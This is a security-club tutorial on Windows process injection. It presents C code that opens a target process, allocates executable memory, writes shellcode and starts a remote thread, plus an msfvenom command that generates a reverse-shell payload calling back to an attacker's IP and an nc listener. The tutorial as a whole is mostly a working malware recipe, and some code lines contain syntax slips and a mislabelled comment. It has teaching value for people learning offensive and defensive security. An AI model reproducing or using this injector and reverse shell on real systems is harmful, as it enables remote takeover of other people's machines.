Skip to content

Process Injection

DISCLAIMER

Cyber@UC is not responsible for any damages you cause with the information you learn in this lesson. Every AV in the world will detect all this anyway so don't even try it. You will get caught.

What is process injection?

Process injection is when a program injects malicious code into another process's memory and has the remote process execute that malicious code.

What are the steps of process injection

First we are going to need to open a process that we want to inject code into. Then we need to allocated extra memory in the process to house our malicious code. Finally we create a thread at that new memory location and have the thread execute manually.

Coding Process Injection

Go ahead an open up an IDE everything is hands on from here on out

We are going to need to define some global variables before we go into the main function

DWORD PID; // will be the process ID of the process we are targeting
DWORD TID; // will be the process ID of the process we are targeting
HANDLE hProcess; // will be the handle to the process we open
HANDLE hThread; // will be the handle to the thread we create
LPVOID rBuffer; // will be a pointer to the start of the allocated memory we create

For our program we are going to take the PID of the process we want to inject into as a command line argument. For example when you run the program you would do virus.exe 9012 

int main(int agrc, char* argv[]) {
    // Remember PID is the global variable we defined
    PID = atoi(argv[1]);
}

Next we need to open the process which can be done with OpenProcess. Here is the syntax

HANDLE OpenProcess(
  [in] DWORD dwDesiredAccess,
  [in] BOOL  bInheritHandle,
  [in] DWORD dwProcessId
);

The first argument is asking how much access should we try the open the process with, if you were trying to make this avoid getting detected you would try to open with the least amount needed. Maybe you only need to be able to create threads. For this we are just going to try to open the process with all the access we can have. Now this will return a handle to the process we want to open. With this handle we can give it to the API to interact with that process

hProcess = OpenProcess(
    PROCESS_ALL_ACCESS,
    FALSE,
    PID
);

You will also want to do some error checking, this could fail

if (hProcess == NULL) {
    printf("Failed to open process, error code: %ld", GetLastError());
}

GetLastError() returns the system error code of the last error that happen within the windows API. You can find the descriptions of error codes here

Next we need to allocated some memory in the process virtual address space. We will do that with VirtualAllocEx the syntax is the following

LPVOID VirtualAllocEx(
  [in]           HANDLE hProcess, // The process to allocate memory to
  [in, optional] LPVOID lpAddress, // The starting address we want
  [in]           SIZE_T dwSize, // How much  to allocated
  [in]           DWORD  flAllocationType, // type of allocation
  [in]           DWORD  flProtect // The permissions of this memory
);

We don't have a particular place we want this new memory to start if we put NULL the function will just find a suitable area for us. 

rBuffer = VirtualAllocEx(
    hProcess,
    NULL,
    sizeof(payload),
    MEM_COMMIT | MEM_RESERVE,
    PAGE_EXECUTE_READWRITE
);

We use sizeof(payload) to allocate enough memory for our payload

MEM_RESERVE reserves virtual address spaces but does not actually allocate any memory on actual RAM. You use MEM_COMMIT for it to actually allocate real memory

We used PAGE_EXECUTE_READWRITE meaning we can read, write, and execute this memory. We really only need write and execute permissions so we could use PAGE_EXECUTE_READ but i'm trying to make everything simple.

That function should return a pointer to the start of that new memory. Otherwise it returns NULL if it fails. So make sure you do error checking

if (rBuffer == NULL) {
    printf("Failed to allocate memory, error: %ld", GetLastError());
}

Now we need to write our payload to this new memory (yes ik our payload is empty rn). We can accomplish this many ways but we will use WriteProcessMemory 

BOOL WriteProcessMemory(
  [in]  HANDLE  hProcess, // The process we are writting memory to
  [in]  LPVOID  lpBaseAddress, // Where we want to write this memory
  [in]  LPCVOID lpBuffer, // The data we want to write
  [in]  SIZE_T  nSize, // How much data we writing
  [out] SIZE_T  *lpNumberOfBytesWritten // Tells us how much got written
);

I feel like this is a easy one to understand. This is were we actually inject our malicious code

BOOL wrote = WriteProcessMemory(
    hProcess,
    rBuffer,
    payload
    sizeof(payload)
    NULL
);

if (!wrote) {
    printf("Failed to write payload, error: %ld", GetLastError());
}

We almost done we just need to create a thread with CreateRemoteThreadEx

HANDLE CreateRemoteThreadEx(
  [in]            HANDLE                       hProcess, // The process
  [in, optional]  LPSECURITY_ATTRIBUTES        lpThreadAttributes,
  [in]            SIZE_T                       dwStackSize,
  [in]            LPTHREAD_START_ROUTINE       lpStartAddress, 
  [in, optional]  LPVOID                       lpParameter,
  [in]            DWORD                        dwCreationFlags,
  [in, optional]  LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList,
  [out, optional] LPDWORD                      lpThreadId
);

Almost all parameters don't matter expect hProcess,lpStartAddress,dwCreationFlags, and lpThreadID. lpStartAddress is just asking where want to this thread to start, though it needs to be a type of LPTHREAD_START_ROUTINE so we need to cast our buffer to that type. The last one,lpThreadId, gives us the thread ID of the newly created thread. For dwCreationFlags we put 0 which just means that the thread will immediately execute after it has been created

hThread = CreateRemoteThreadEx(
    hProcess,
    NULL,
    0,
    (LPTHREAD_START_ROUTINE)rBuffer,
    NULL,
    0,
    0,
    &TID
)

if (!hThread) {
    printf("Failed to create thread, error: %ld", GetLastError());
}

Now if we just leave it be our code will just execute and immediately terminate. We need it stay open and let the malicious code run

WaitForSingleObject(hThread, INFINITE);

This will make the program hang on that line until the thread finishes execution

Lastly we should probably do some cleaning and tell the windows API we are no longer using the handles we requested

CloseHandle(hProcess);
CloseHandle(hThread);

We have finished with the coding but we still need to generate a payload

Generating the payload

Since we are trying to inject code into a process's memory we can't just inject some C code straight into memory. The computer does not understand C. We need to inject code that the computer understands and that would be raw machine code. In hacking when we have a payload we want to execute on a victims computer we call it shellcode. Writing your own shellcode is pretty difficult. Luckily Metasploit can actually generate shellcode for you.

Go ahead a boot up a Kali vm or Kali WSL

Our payload will be code that will start a reverse shell between you on your Kali machine. So go ahead and write down the IP address of your Kali machine, run ifconfig to find your IP.

To generate the payload we want run the following command. And replace IP with yours

msfvenom --platform windows --arch x64 -p windows/x64/shell_reverse_tcp LHOST=<YOUR IP> LPORT=7070 EXITFUNC=thread -f c --var-name=payload

Copy the C variable that it returns. After that start up a NetCat listener on the port you picked

nc -lnvp 7070

Now copy that payload back to the malware program IMPORTANT make sure your payload ends with \x00 you will need to add that.

Everything is set and your ready to test your malware. Go ahead and open a random process (I recommend a simple application like notepad or calculator). Find its PID in task manager

Once you have PID run your program and provide the PID like so

.\program.exe <PID>

You should get a reverse shell on your Kali machine